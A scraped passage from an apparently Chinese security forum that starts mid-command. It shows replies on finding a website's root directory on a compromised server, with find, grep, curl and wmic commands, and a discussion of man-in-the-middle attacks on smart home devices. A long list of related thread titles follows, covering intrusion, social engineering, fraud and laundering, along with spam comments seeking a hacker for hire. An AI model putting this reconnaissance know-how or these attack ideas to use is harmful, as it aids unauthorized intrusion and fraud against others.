-maxdepth 3 -name "*" 2>&1|xargs grep -s -i 'root /'| grep -s -i 'nginx\|apache';echo "-----------------------done----------------------" 输出: -----------------------start--------------------- /etc/nginx/sites-enabled/default: root /var/www/html; /etc/nginx/sites-enabled/default:# root /var/www/example.com; /etc/nginx/sites-available/default: root /var/www/html; /etc/nginx/sites-available/default:# root /var/www/example.com; /etc/apache2/mods-available/cache_disk.conf: CacheRoot /var/cache/apache2/mod_cache_disk /etc/apache2/sites-enabled/000-default.conf: DocumentRoot /var/www/html /etc/apache2/sites-available/000-default.conf: DocumentRoot /var/www/html /etc/apache2/sites-available/default-ssl.conf: DocumentRoot /var/www/html -----------------------done---------------------- 18# 麦兜 (麦兜爱吃苹果) | 2015-10-24 16:46 For I in (curl http://localhost |grep -oP ([a-Z]{1-6})[\.js]));do for d in $(find / -name "*.js");do grep $i $d;done;done 没实验,意思是打开首页匹配js文件。系统内搜索所有文件js文件,匹配js文件名 19# 无敌L.t.H (‮……天百一爱恋考高:簿相色白产国) | 2015-10-24 19:43 用lsof也可以,看打开的文件,不过不一定装有,对于用缓存的也不好办。 20# huotoo | 2015-10-25 11:18 要是网站根目录下有robots.txt 我觉得 通常 locate robots.txt 觉可以了 21# Blackeagle (向WooYun致敬) | 2015-10-25 12:29 grep -r "robots" www 22# 小胖子 (z7y首席代言人,园长的表哥...) | 2015-10-25 14:56 看你们都说linux下的 我来说说windows下 win下,简单办法,从web找一个banner 比如 xsser.avi 执行 wmic datafile where "filename='xsser' and extension='avi'" get caption 搞定。 23# 围剿 (七月流火,八月未央,九月白露凝成轻霜) | 2015-10-25 15:42 find index.php 24# _Evil (科普是一种公益行为) | 2015-10-26 09:17 Java EE application case : http://baidu.com/wooyun/ pwd: /opt/xxx cd /opt/xxx/webapps/ROOT/ or /opt/xxx/webapps/wooyun/ war:/opt/xxx/webapps/wooyun.war or /opt/xxx/webapps/wooyun.{还有一个后缀名字忘记了} 25# 爱捣蛋的鬼 | 2015-10-26 09:36 @Sunshie 还有tengine, :) 26# 爱捣蛋的鬼 | 2015-10-26 09:43 @mramydne ubuntu :) 27# 核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2015-10-26 15:24 dir /s/a-d/b d:\*重复度较低的文件名(支持通配符)* 留言评论(旧系统): 佚名 @ 2015-12-04 14:50:10 我想找个黑客帮我拿站 业务很多1343119337 本站回复: -_-!!! 佚名 @ 2016-01-17 01:03:00 我被封笔尘缘骗了1800 接单的联系我1343119337 本站回复: 站长提示:网络广告有风险,注意辨别,谨防上当受骗!!! 合作 @ 2016-04-20 16:47:37 2819306134 本站回复: ? 合作 @ 2016-04-20 16:49:25 2819306134 本站回复: ?

2015/10/26
articleCard.readMore

讨论:关于家用智能设备中间人攻击的实用场景考量,户外物理渗透

关于家用智能设备中间人攻击的实用场景考量 么么哒 | 2015-10-26 10:57 首先这个讨论对事不对人,希望大家多发表下自己的观点. 在 geekpwn 看到有演示项目对很多智能设备的 pwn ,项目中有很多亮点比如段老师对 https 的 pwn 还有第二天 tk 对条形码的攻击都十分精彩. 本次讨论的重点就是对智能设备的 attack surface 尤其是家用设备,其中中间人攻击到底能发挥多大价值.gp 中有人演示对智能烤箱的中间人劫持的攻击,通过破解其通信中的 sign 来达到篡改控制烤箱的请求.可以操作烤箱的温度等等效果. 我们细想下这种场景如何才能触发了: 1.一定要在被攻击家附件,wifi 信号能覆盖到.(钢筋混凝土对 wifi 信号削弱极大,如果是高楼目测就只能去他家门口蹲着了,希望不会被打吧..) 2.你现在有信号了,wifi 密码还能得破解.现在就寄希望于 WPS /爆破/ 以及XX钥匙贡献数据了,不知道成功几率有多大. 说到这里那么对智能路由器的 pwn 好像也需要类似情况,首先家用智能设备对外网转发端口的情况极少,也就是说对智能路由器的攻击也需要上述两个苛刻的条件.而演示的是控制路由器对 dns 进行劫持..其实一台初始路由器要完成 dns 劫持是不需要 root 就可以轻松完成的..不否认路由器的 root 确实功力很深..但是这种功在实际攻击中价值几何? 现在智能设备极其火热,很多产品的可用性以及成熟度都不高,大家都已经开始研究就安全问题了.有一定前瞻性是不错的.但是总感觉有点本末倒置. 安全走在产品前面到底是好是坏了? [原文地址] 各种吐槽: 1# xsser (十根阳具有长短!!) | 2015-10-26 11:05 漏洞价值=攻击收益-攻击成本; 攻击成本=技术成本+使用成本; 漏洞价值=攻击收益-技术成本-使用成本; 求继续..... 2# answer | 2015-10-26 11:09 暗示 3# 包包 | 2015-10-26 11:30 个人感觉,比如geekpwn上面的,一些九阳豆浆机啊,洗衣机什么的,一些漏洞,完全是鸡肋啊。。智能硬件的漏洞,之所以火起来,感觉就是因为国外的牛撸了什么什么车子。国内就开始跟风了。。 4# 瘦蛟舞 (科普是一种公益行为) | 2015-10-26 11:39 很早之前总结的一些.. - 通信/协议 * 常用协议:xmpp/蓝牙/wifi/http * 通信加密 * 通信签名 - 设计逻辑 * deviceID/UUID 可预测 * 管理接口(console/telnet/SSH...)无认证/默认口令 - 后端漏洞 * 注入 * 越权 - 硬件 * 模块更换/欺骗 中间人的话评定为: 中危+高攻击陈本. 5# 守望 | 2015-10-26 12:12 @xsser 漏洞价值=攻击收益-技术成本-使用成本; 据此推论漏洞价值的最大化,就在于要尽可能地放大攻击收益的值以及尽可能地缩小技术成本和使用成本,而后两者在某种情况下基本上的可变区间并不大,而攻击收益收益这个值却不好评估。也就是说攻击一个普通人这个基本上就没多大价值了,但是对于国家领导、商业人物等等重要角色来讲就会大大的放大漏洞价值。 6# l137 (有些事情不是你不去看,它就没了的) | 2015-10-26 13:44 9494, 漏洞作为宣传的目的已经达到了~ 7# xsser (十根阳具有长短!!) | 2015-10-26 13:56 @守望 领导人不会用你家的智能微波炉吧 8# 核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2015-10-26 15:31 瞎鸡巴跟风。 9# 核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2015-10-26 15:31 瞎鸡巴跟风。+1 10# nony (Not do is die...) | 2015-10-26 15:46 瞎鸡巴跟风。+2 11# px1624 (aaaaaaaaa) | 2015-10-26 15:52 感觉这种安全还是相对的,我用wap2 然后密码设置字母、数字、特殊字符 15位以上,然后wifi设置隐藏,不用万能钥匙这些东西,我就不信你蹲我家门口可以黑我的豆浆机。 12# 存在敏感词 (昵称存在敏感词) | 2015-10-26 15:54 不是所有的针对智能设备的攻击都是在局域网内发起的啊,攻击云端实现远程劫持的案例也非常多 而且就算是在局域网内发起的攻击,也不一定要到你家楼下去搞,比如CSRF?案例也不少吧,比如当年很多路由器的dns劫持 至于是不是鸡肋。。远程杀人烧房子是有点扯淡,但是用智能设备搞蠕虫做ddos黑产已经玩的很6了 13# 小忆 | 2015-10-26 16:09 太认真就输了 14# Tea (◆冃.狌.交.伖,释.鲂.压.劦、棑.解.漃.瘼◆ 真 人】视||频. █网.址:wWw. wooyun.Org◆@程序员段子 xSsEr@Wooyun ┋◆冃.狌.交.伖,释.鲂.压.劦、棑.解.漃.瘼◆ 真 人】视||频. █网.址:zOnE.wooyun.Org◆┋) | 2015-10-26 16:48 这是HackPwn不是么?Geek还是有很大区别的吧?个人拙见~~~ 相关内容: 物理黑客:使用空气清新剂喷雾触发传感器来打开“安全”门! 北京NDS公司工程师攻击46万台机顶盒传播反动信息 获刑12年 GSM Sniffer WEB 界面搭建测试 反黑逆向溯源追踪之:某某某局入侵事件分析 物理安全之开锁技能,物理黑客开锁方法大全 100 美元,打造一个“开锁大师” 100 美元,打造一个“开锁大师”,自动开锁机秒开任何转盘密码锁! 保护自己之:如何打造运行在U盘上的操作系统,防查水表大法! 号称不会被查水表的通信APP-Telegram,悬赏20万美元求漏洞 社会工程学:一张SIM卡引发的连锁社工人肉案例 讨论:如何在网络上保护个人隐私?互联网时代的隐私泄露与安全保护? 如何利用无人机、四轴飞行器、飞艇远程大范围入侵WIFI并自动渗透内网? JS绕过代理、VPN获取真实IP及内网IP,逆向追踪 简单获取CDN背后网站的真实IP,CDN逆向,反向跟踪网站真实IP MD5散列密码不等于MD5的安全性 [翻译]Python开发中的密码散列(Hashing) wifi环境下获取对方手机号码的可能性 Hack无线门铃 - 简单分析和重放攻击,信号重放,无线物理硬件黑客 嵌入式设备中的盲注 (翻译) 【视频】黑客远程入侵汽车解锁车门,汽车电子钥匙信号重放,重放钥匙扣信号 iSniff GPS:WIFI被动嗅探工具,嗅探附近无线设备广播泄漏信息定位 JSON探针—定位目标网络虚拟信息身份,利用大量三方网站cookie进行追踪 全自动无线入侵热点,黑客全自动WIFI钓鱼,大规模批量无线热点钓鱼 汽车设备安全问题,ETC通道缴费信号伪造,如何免费跑高速 三种方法还原ASP.NET可逆加密内容 WiFi流量劫持:网站JS脚本缓存投毒!长期控制!浏览任意页面即可中毒! 某些WIFI分享软件存在缺陷可能导致电脑内文件被他人读取 如何入侵控制交通红绿灯?美研究人员发现劫持交通灯其实非常简单 走进科学:银行ATM机真的安全吗? 某款网络摄像机直接获取帐号密码,视频监控设备配置信息泄露漏洞 讨论:关于手机话费套现的问题,手机的电话费如何套现? 讨论如何入侵演唱会无线话筒,hack掉演唱会无线麦的可能性 社会工程学追踪 妻子花6万挖出小三 给60多个号充话费锁定4人 逆向追踪一起针对国内企业OA系统精心策划的大规模钓鱼攻击事件 警察说:电话诈骗中,骗子存在哪些漏洞 渗透道哥的黑板报里那个骗子网站,入侵电话诈骗的骗子网站 同事亲历的一次电话诈骗 【警惕】一个神秘电话,工商银行卡内余额不翼而飞!网银诈骗! 论黑产黑阔如何安全地转移赃款/洗钱? 论匿名转帐和转移资产的可能,如何:网络匿迹、匿名洗钱、转移资产系统 跨行、跨省银行卡间转账不用手续费?利用支付宝为什么不收手续费? 讨论电影中出现的各种骇客、黑客入侵手法,《幽灵》、《神探夏洛克》 Discuz 爆破无视验证码,PHP 调用社工库暴破 Discuz 论坛账户脚本 现实生活中的社工:批量搞同学校里妹子QQ、手机等信息,伪装老师套学生信息 伪装快递打电话社工地址,我这样用手机社目标住址大家觉得可行吗? 移动"4G"卡所带来的威胁,随便补办别人手机卡?4G换卡补办别人手机号? 如果躲开支付宝风险监控,何才能做到不违反支付宝风控条件呢? 对小米论坛泄露数据的一次分析 密码成功破解率高达37.8% 讨论:因为这次小米信息泄漏事件,总结一下数据泄漏造成的危害 python加密通讯后门 网络匿迹、逆向追踪:关于那些做H站的人,是怎么落网的? 中航信系统漏洞泄露乘客信息,查询任意航班乘机人姓名,航班号,身份证,手机号 移动电源内置窃听器,在淘宝上买的充电宝内置远程定位、监听硬件后门! APT攻击:境外间谍“飞哥”假扮女网友策反境内人员 窃取中国军事秘密 采集指定域名邮箱用于社工或者fuzz的PHP小脚本 基于行为特征识别的网络诈骗嫌疑人追踪系统 社工算是一种技术吗?社会工程学讨论…… 户外物理渗透:终端机,客户端的web测试思路 逆向追踪,反向爆菊:在服务器上发现了挖矿程序,求爆菊姿势 Angry Birds和广告系统泄露个人信息——FireEye对Angry Birds的分析 2014 最新 web qq 密码的加密方式分析过程,WebQQ 登陆密码加密算法分析 小米手机客户资料泄露了吗?冒充小米售后回访诈骗电话:01053799231 【愚人节分享】一个钓鱼方法【测试几分钟有成功案例】 使用WiFi真的有那么危险吗?安全科普:教你增强自己的无线网络安全 WiFi里的猫腻:变色龙病毒,无线破解、蹭网,蜜罐路由器,黑吃黑 黑客讲故事:攻下隔壁女生路由器后,我都做了些什么,无线路由器被蹭网后,入侵女神 女黑客Oona,分析直升机现场拍摄警车追捕画面中的信号声,绘出飞机飞行轨迹 多层代理下解决链路低延迟的技巧,多层代理网络匿迹,反追踪,隐藏、保护自己 WIFI蜜灌之路由上的会话劫持 基于Wordpress Pingback的反追踪思路?木马远控通过“代理”上线? 指纹门控的安全,户外物理设备入侵,如何入侵绕过指纹识别安全锁、门控系统 发个社工福利站,搜库 - 密码泄露查询,社工库,泄露密码查询库 揭露一个飞机退改签的诈骗:借口机票退改签要退款,索要银行卡号,套取个人信息 支付宝存漏洞 嫌犯伪造执照盗刷网店20余万 新型“变色龙”:可以通过空气传播的Wifi网络病毒 京东惨招恶意炒作,数据库泄露为撞库攻击 DedeCMS 注入漏洞批量入侵爆菊 Exp 玩转无线 -- GNURADIO 简单运用 进入了路由器怎么让她进入我的钓鱼网页? 已知IP能定位到多么具体的地理位置?市级? 已更新Iwork10测评!求推荐一款便携式户外物理移动渗透终端设备!!! 求推荐一款便携式户外物理移动渗透终端设备!!! 一起网络诈骗案的风险揭示,套取用户信息、信用卡、支付宝、快捷支付洗钱 视频监控的一种通杀问题?大部分视频监控系统客户端无需密码? 如何在网络中隐藏自己?再论拨了国外VPN代理,是否可被逆向追踪? 江西男子克隆国外银行卡刷513万 给两任女友395万 跨境盗刷信用卡 支付宝/淘宝帐号无需密码登录任意帐号,随意查看用户资料/交易记录/转账洗钱 个人认为微信支付存在的安全问题,同一银行卡多重绑定,恶意盗刷 一基友再遇奇葩无线网络环境,顺便求二级/三级/四级ISP的盈利方式? Hikvision IP Cameras Multiple Vulnerabilities,海康威视IP摄像机的多个漏洞 Hikvision IP Cameras Multiple Vulnerabilities, 海康威视IP摄像机的多个漏洞 穷举海康威视监控密码的小程序,入侵海康威视IP摄像机 已获得网络出口引擎管理员权限,试问监控全网HTTP密码传输可能性? 关于3G流量上网卡!(匿名上网),隐藏自己、网络匿迹、保护自己 浅谈社工,欢迎讨论、补充,各种猥琐社工、人肉技巧,物理社工、人肉 【TED】Markham Nolan:如何辨别网上信息真伪,神级人肉,物理社工 探秘国际职业黑客:插U盘植入木马如同拍电影,做得上班族扮得007,社工大师 求助加密代码解密!!!比较另类的“加密”一句话木马后门…… 俄罗斯黑客被曝潜伏Facebook,搭建蜜罐监视tor网络数据 保护水表:关于tor和mac地址的疑问,各位进来讨论一下,反追踪/匿迹 XX域名商实战,社工客服妹妹,毫不费力拿到目标公司内部通讯录 黑阔大牛来说一说切实可行的匿名上网方法 2000万条酒店开房数据泄露 男子婚事被搅黄 探秘时刻:多重身份的逃犯,不翼而飞的七百万,几百买身份证一票弄了700万 由“正方”jiam、jiemi之逆向思及Base64之逆编码表 教你怎样关闭Windows的摄像头指示灯(含视频) 定位系统那些事儿 走近科学:破解苹果MacBook摄像头进行秘密监控 利用声学密码分析攻击破译4096位RSA加密算法 FreeBuf2014贺岁视频: 极客教你如何劫持无人机 针对工行诈骗黑产团伙的调查回忆录 开房数据泄露案告破 警方发现嫌犯曾参与多起网络犯罪 再论黑卡,黑吃黑,银行黑卡,超级网银签约直接转账 国外成功使用电视棒接收玉兔登陆信号 Liftoh木马钓鱼邮件正在进行时 物理攻击?那些年我们忽略掉的一些社会工程学手段 ATM 机里装着什么?ATM 机的结构是什么?ATM 的构造原理? 娱乐贴:看我如何逃避追查以及洗钱 我是这么设计高性能海量数(ku)据(zi)查询系统的(一) 看到有同学在问支付宝快捷支付漏洞--转一篇科普文章 利用ZoomEye探索互联网hikvision摄像头 记一次 三打哈网 社工获取到服务器 全方位在互联网中保护自己第八章(如何留住数据的节操(上)) 探秘短信马产业链-从逆向到爆菊 探秘伪基站产业链 您的工商银行电子密码器将于次日失效?伪基站垃圾短信,网银钓鱼诈骗! 搞到另外一个妹子运动会的照片,求眼尖的看看是哪所学校 讨论一下,怎么才能社工到岛国AV女优的真实资料,例如:泷泽萝拉 谷歌云端硬盘在天朝是否真的安全? 朋友点开一个文件给骗30万,一种“高级”QQ诈骗骗术,远控电脑诈骗 关于伪基站的一些问题:信号覆盖范围?设备成本?是否违法?教程资料? 【巨狗血!】奇葩的比特币钓鱼案例!!!!!! 抛砖引玉,扒扒伪基站那些事 社工思路讨论:如何根据蛛丝马迹来找到具体的人或者物? 伪基站是怎么定位的呢?定位并抓捕伪基站、圈地短信、垃圾短信犯罪团伙! 【讨论】伪基站、圈地短信设备是怎么做出来的? 偷取一个人的钱包,还能让他告诉我信用卡的提款密码 ? 技术讨论:关于盗取支付宝讨论 【防骗】又见网银诈骗,骗子冒充朋友,借口卡丢了先借你卡转账用用,揭秘! 遇到一个加密方式 只有1和0 求大神告知,二进制字符串“加密” 全方位在互联网中保护自己第七章(上网习惯以及计算机唯一代码追踪的防范) 社工某黑阔大牛的域名,“脑残”客服,狗血 +10086!!! GSM Hackeing 之 SMS Sniffer 学习 京东 淘宝 天猫订单信息泄露诈骗, 接到“京东”的客服电话之后遭遇团伙诈骗 讨论:通过无线路由渗透入侵内网电脑,如何从无线路由器到个人PC机? 为什么所有的无线频率都是2.4GHz? 金融改革记录片(97% Owned)-97%被私人银行占据的无中生有债务货币 动画科普:银行与货币系统真相,动画揭露货币系统真相 谈谈时事:电话“诈”弹导致多地机场飞机被迫返航,论如何打电话不被追踪 如何发现系统中的异常,交易系统异常行为监控机制讨论 [技术分析]利用波士顿马拉松爆炸案热点的新型APT攻击 了解你的对手:追踪快速响应的APT攻击 【讨论】今天偶遇淘宝另类“骗钱”技巧 社工个人电脑到内网渗透系列 如何通过域账户来定位域机器 淘宝一星期【骗】20万的可行性过程分析 服务器流量异常追踪--抵抗AWVS扫描 【略狗血】一种结合本地程序的更加猥琐的钓鱼方式(中招率+100%) 阴谋论:政府通过手机基站的电子精神控制 adobe 1.5亿泄露数据 密码算法逆向挑战 逆向追踪之:通过QQ群里的图片逆向入侵,拿了几个phpddos的脚本 一个反制钓鱼邮件的思路 从丝绸之路到安全运维与风险控制 上集 CDN流量放大攻击思路 俺在国外当会棍 -- WIFI 篇 讨论下快捷支付存在的风险 讨论下快捷支付存在的风险 娱乐贴:打击网络诈骗 - 骗子骗钱反被骗 - 发个骗子的手法,其实还是时时彩 全方位在互联网中保护自己第六章(国产软件或后门软件的替代品(下)) 俺在国外当会棍 -- 开锁篇 俺在国外当会棍 -- 开锁篇,旺财看“黑客锁匠大会” 逆向追踪:查找360wifi(知道ssid)的使用者 Windows下的无线热点蜜罐 全方位在互联网中保护自己第三章(知识普及篇—了解网监的实力与暗箭(下) 全方位在互联网中保护自己第一章(知识概念篇第一部分) 各位黑括小心cmd5泄漏自己 简单分析丝绸之路创始人如何被抓,FBI真的能透过TOR获取真实IP么? 全方位在互联网中保护自己第五章(国产软件或后门软件的替代品(中)) 全方位在互联网中保护自己第四章(国产软件或后门软件的替代品(上)) 全方位在互联网中保护自己第二章(知识普及篇第二章-了解网监的实力与暗箭(上)) QQ鱼饵病毒:巧妙突破QQ客户端对钓鱼网站拦截 未来利用大脑频率杀死人类猜想(讨论) 互联网安全大会360关于百度安全联盟"闹会"的声明 ← 不炒作会死?会死! 求黑产大牛目测,一位妹纸的亲身经历,身份证号+手机号洗你银行卡 在准备好玩的 RF Hacking 入门给大家... 如何用意念获取附近美女的手机号码,伪装免费CMCC信号,钓鱼妹子手机号码 怪异!10086短信接口泄露?10086发博彩、赌博短信 银行卡里钱莫名其妙被转走了,有身份证号码、姓名、银行卡号就能提款? 在申诉中猜想QQ密码可能明文储存,讨论腾讯申诉“历史密码”机制 小米云服务同步“wlan设置”的安全性,小米已收集了32万wifi明文密码 电影/电视剧/纪实片 信用卡信息泄漏猜想 注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪 浅谈怎样保住数据最后的贞操 移动自助终端未授权访问-通杀丽江 昨天从忘记带钥匙里学到的 昨天从忘记带钥匙里学到的,欢乐讨论:各种开锁、物理黑客 现在傻逼太多,骗人太好骗,淘宝搜剑灵激活码,好多10几块钱的骗子 如何看两个ip是不是在一个机房,路由追踪 猜想:利用GFW使中国对外网络瘫痪??? 逆向追踪之:网站被挂淘客跳转以后发生的事情 病患信息遭泄露 骗子假扮医生短信要红包 猜想_利用终端查询机日内网 免费购物 会员卡加钱??? “联通3G无限 流量卡”淘宝上这种无限流量的卡可信度有多少? 【逆向爆菊】某DDOS事件逆向追踪。。。有人深挖过吗? “伪基站”任意冒用手机号短信诈骗 别对我撒谎 让支付简单一点 如何保护自己之防非IP方式追查,黑钱提线,赃物收货。。。。 为抓小偷 俄警方在地铁安装能读取乘客手机信息的设备,这是啥技术? 汽车也能被入侵:美黑客本周将公布入侵方式 一次蜜罐社工套0day! 山西破获首起“伪基站”案件 逆向爆菊、反向追踪之:追查史上最奇葩的“挂马”黑客! 物理设备安全大牛 Barnaby Jack 挂了... 保护自己之手机定位信息收集 一个诈骗类的技术性问题,朋友的! 技术讨论: 楼宇广告终端 怎么破? 入侵户外广告大屏幕! 请教关于手机IMEI定位的问题 安全跑路指南2013之乌云版【连载中】 飞机上自带显示屏的安全测试 一种巨猥琐的挂马方法、超淫荡的APT攻击思路:如果这么挂马会不会挂进内网 女士回电信诈骗电话 几秒钟时间100元话费没了 (视频)USRP 来Sniffing 无线键盘,27Mhz keyboard sniffing (视频)USRP 来 Sniffing 无线键盘,27Mhz keyboard sniffing 腾讯泄露隐私?看卫士哥获得女神的好友的名单,社工可能认识的人! 发两个qq钓鱼站点 求测试 - 乌云白帽子 XSS 实例 刚刚看到个鱼站,然后就被轮流爆菊了…… 如何设置安全的密码 小型APT之看我如何入侵电视,我是如何入侵智能电视的 全面披露华硕十款无线路由器 - AiCloud启用单位的多个漏洞 应用安全思维系列之一:如何保护密码才安全 一张随意拍摄的波士顿马拉松比赛照片,如何帮助FBI破案 我们是如何通过一张照片定位到疯狗位置的 分享下自己使用的保护方法篇章二(虚拟机模板环境设置) 连载中... 针对莱特币的新木马被发现 钟馗之眼(ZoomEye):网络空间搜索引擎 Carberp源代码泄露后续——黑掉黑客 黑市交易 – 女性肉鸡价格比男性贵100倍 麻省理工发明可以穿墙透视的WiFi雷达 俄罗斯富豪想借科技求永生 欲将大脑植入机器 如何用ZoomEye(钟馗之眼)批量获得站点权限 分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置)连载中... 分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置) 连载中... 使用电视棒接收飞机信号简单的实现方法 使用电视棒接收飞机信号 简单的实现方法 超级短信DDOS 女生一天收上万条10086短信 还有近50万条等着她 微信聊天都是你好友吗?“诈骗”之“微信社工学” 【姊妹花】淘宝一敬业诈骗【50和我谈了一个小时】 讨论如何通过航空飞机的互联网入侵、劫持飞机上的乘客,入侵劫持卫星 R820T电视棒+软件无线电跟踪飞机飞行轨迹(SDR&ADS-B) rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹ADS-B/TCAS/SSR rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹 ADS-B/TCAS/SSR 电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪 rtl-sdr,RTL2832电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪 雇黑客攻陷招生网站改成绩 3骗子做发财梦进看守所 淘宝钓鱼诈骗,如今淘宝各个分支产业对网民不利的分支缺陷 公布一个非常高端的淘宝店铺骗局方法 揭秘美国网军:纯铜包裹建筑防信号外泄 黑客改造脑波耳机,让您可以通过思想控制建筑物 [技术实现]美国国安局如何实现海量用户数据的监控? 针对性攻击与移动安全漏洞 视频: Dtac:将宠物变成了WiFi热点,泰国运营商将宠物变成WiFi热点 户外物理设备入侵之:入侵并“调教”中控指纹语音考勤系统(打卡机) 视频: 可以用手势控制的Wi-Fi:WiSee 上来吐个槽,再次侦破一宗牵扯到全国多个大型医疗集团的恶性案件! WIFI信号可用于识别身体姿势 再次遭遇 GoTop 挂机刷钱“病毒”,逆向爆菊,追踪背后“牧马人” 公共无线安全——FakeAP之WiFi钓鱼 DNS域传送信息泄露 GNU Radio USRP OpenBTS 小区短信 区域短信 一种牛逼的短信群发技术 GNU Radio 小区短信 区域短信 免费发 无法拦截 【传奇】看职业骗子如何揭发谷歌广告服务的不法活动,谷歌5亿美元和解费 如何抵御社工库类的黑客攻击?在明文密码已泄露的情况下保护自己? 钓鱼之XSIO漏洞,一个非常猥琐的“漏洞” 54dns劫持实现dns钓鱼攻击威胁? 监听空中的无线电,监听polices对讲机 如何管理一流的人才 + 这次真的谈谈如何管理一流人才:圈养牛人 0x80c IRC 网络安全匿名聊天室 百度搜索页面劫持脚本,百度搜索来路页面跳转劫持,骗点击 上海伊莱美医院被黑、黑帽SEO做淘宝客,核总深入追查,揪出内鬼! 支付宝木马爆菊过程总结帖【附源码】 接上一章节,支付宝木马,后续情节【2】 高级钓鱼攻击来了:针对拍拍的XSS攻击 接上一章节,支付宝木马,后续情节 360对你真的起作用了吗?bypass....分析支付宝网银木马,反爆菊花 周末湖边 Sniffing ADS-B,Hack 私人小型机场 一种猥琐方式的对攻击者定位(观315有感) 关机后仍能提取出内存中的关键信息,计算机关闭后内存数据泄露 视频: ATM 的那点事! ATM 漏洞, Hack for fun! 利用磁卡导致ATM关机 嘿嘿,发现个ATM 漏洞, 利用磁卡导致ATM关机 国外发现中国针对美国无人机厂商的APT攻击 中国是全球最大的的APT攻击来源 揭秘诈骗千万人民币的团伙及具体位置分析 淘宝又见好东西,低价格钓鱼几个倒霉蛋骗到手大额的款项,跑路、关店 核总霸气分析“天津丽人女子医院”主站被黑、挂淘宝客、黑帽SEO全过程! 如何用Android智能手机劫持一架飞机(PPT下载) 公安部督办QQ红钻诈骗案破获 腾讯损失3000余万 中国电信ADSL宽带信息泄露,可查任意IP对应的宽带账号,电话号码,上门砍人 一段黄色笑话引发的DDoS攻击 最彪悍的“黑客”攻破千家银行从未失手 接着核总的《打击钓鱼,人人有责》之后的故事... 打击钓鱼,人人有责…… 研究人员首次发现用于针对性攻击的Android木马 V,背后的故事 + 网友细致分析讨论 + 核总终极点评 【跟风贴】XSS挖出一个黑产团体 XSS挖出一个黑产团体 《XSS挖出一个黑产团体》 山寨广告非法医疗搜索引擎路在何方,医疗 = 巨型诈骗军团! 物理黑客户外硬件入侵之:某咖啡厅的广告展示终端…… 陌陌猥琐流定位妹纸精准位置 有图有真相 + 安卓工具 [终端安全] 一种猥琐的通用绕过某些终端系统沙盒方法 狂人用26台N卡电脑打破pi值运算记录 追查黑客姓名,邮箱,支付宝信息,惊现大规模僵尸网络,要求警方介入处理! 服务器被入侵之后,反爆1433抓鸡黑客菊花,并公布大量黑阔账号密码 公告:关于前两天本站无法打开的原因 + GFW拦截规则原理剖析 [讨论]如何入侵一个户外的电子显示屏 探索网络出口GFW的强度与翻墙 二维码应用漏洞|欺骗|....更多好玩的??? [fixed]中国移动139邮箱之前的一个重置密码流程漏洞 耍了一个发给我网购木马的骗子~~ Base64 格式的密文,Base64 方式的 MD5 密匙,一些编码知识 几种常见的hash加密,怎么判断hash的类型 Inception能入侵全盘加密的计算机,修改物理机器内存/任意密码进入 农行网银体验机,自助终端权限绕过方法 关于迅雷突破物理带宽速度的讨论 android 延迟锁定bug,安卓手机锁破解,屏幕解锁保护 android软件外加监控,隐私安全?!爆个一键root内幕! 关于手机的隐私保护。。 关于X卧底的通话监听、短信记录、定位追踪等侵犯隐私的行为讨论 支付宝的设计问题 401钓鱼新玩法,反向401钓鱼 远程入侵QQ好友所在网吧监控系统,人脸识别、定位坐标,定点打击 也谈新旧SIM卡耗电之争——从手机处理STK异常说起 国外黑客团队,现在的定向攻击模式,高级渗透、社工,游戏托端 骗子卖家利用淘宝交易漏洞骗流量 追踪PlugX Rat作者,人肉定向攻击远控PlugX开发者 中斯警方联合行动抓获百名电信诈骗案嫌疑人 dSploit—Android网络渗透套件测试小记(含视频) 实时抓取移动设备上的通信包(ADVsock2pipe+Wireshark+nc+tcpdump) FBI备忘录显示黑客成功入侵了商业HVAC工控系统 android 手机系统、平台渗透测试神器 dSploit 看新闻学知识之手机千里追回 西安丢iPhone定位在北京民警辗转2400公里追回 来福士等试点室内定位技术 定位GFW的python脚本,如何找到GFW设备的IP地址 三星智能电视被曝安全漏洞 黑客能控制摄像头 电话诈骗手段升级 听按键音破译银行密码 路由器里的终端设备名带来的安全问题 银行等保之网银体验机安全测试 由社工妹子引发的C段沦陷,由社工妹子的引发的内网渗透一条龙 一种可能的针对云端的监控 公共WiFi免费蛋糕能否长久 成本谁来埋单 如果大量短信攻击会不会造成拒绝服务,导致手机接不进电话? 钓鱼网站诱骗支付占据网络不安全事件首位 手机连接不明WiFi网购 网友账户内1200元被盗 微博“兼职”被骗3000 上网“报警”又被骗1300 武汉公安开发尖端人像识别系统 可瞬间辨认嫌疑人 全国摄像头寻人 终端机常见绕过沙盘方法、突破终端机屏幕锁定限制方法大全 东京大学加密招生海报解密过程(内含妹子) “钓鱼”网站横行:运营商与搜索引擎成帮凶 发现APT攻击的破绽 可能的拦截HTTPS加密通信的手段 破解Google Gmail的https新思路 美国极超音速飞机90分钟飞越半球,时速可达4000千米,飞行在太空边缘 单反刷成安卓/ios,手机 psp kindle,连文曲星 计算器 空调遥控器也不放过 Android 无视屏幕解锁保护界面 - 安卓手机锁破解 试验无线网络监听 网络账户密码也可被获取 美国电视节目用波音飞机做坠机实验,让飞机多一些撞击试验 视频:FPSRussia的俄式军火秀 遥控武装四桨直升机[中英双语字幕] 免费 WiFi 是“披着羊皮的狼”,女子蹭网引来20多名警察 一个40位的“md5” 网曝银行卡密码“漏洞” 浦发ATM机两地曝系统故障 用户调侃自助盗号机 王鹏你妹“占领”北京地铁五号线屏幕,关于“王鹏你妹”的真相 北京地铁5号线所有电视屏显示“王鹏你妹”官方回应 谷歌获智能手表专利:原理似谷歌眼镜(图) 网上团购月饼支付变游戏点卡 钓鱼网站借此牟利 视频:神奇的读心大师 网上有你的整个人生 利用社工+人肉来做神棍…… 视频:神奇的读心大师 网上有你的整个人生 利用社工+人肉来做神棍…… 法国政府约谈Facebook称泄漏用户个人隐私 十一黄金周 钓鱼网站常以优惠做诈骗噱头 解密搜狗搜集用户信息的用途 Flightradar24 网站“直播”天上“堵飞机” 看全球实时航班 《魔兽世界》截屏数据水印惊现用户私人数据 截图隐藏水印 暗含玩家信息 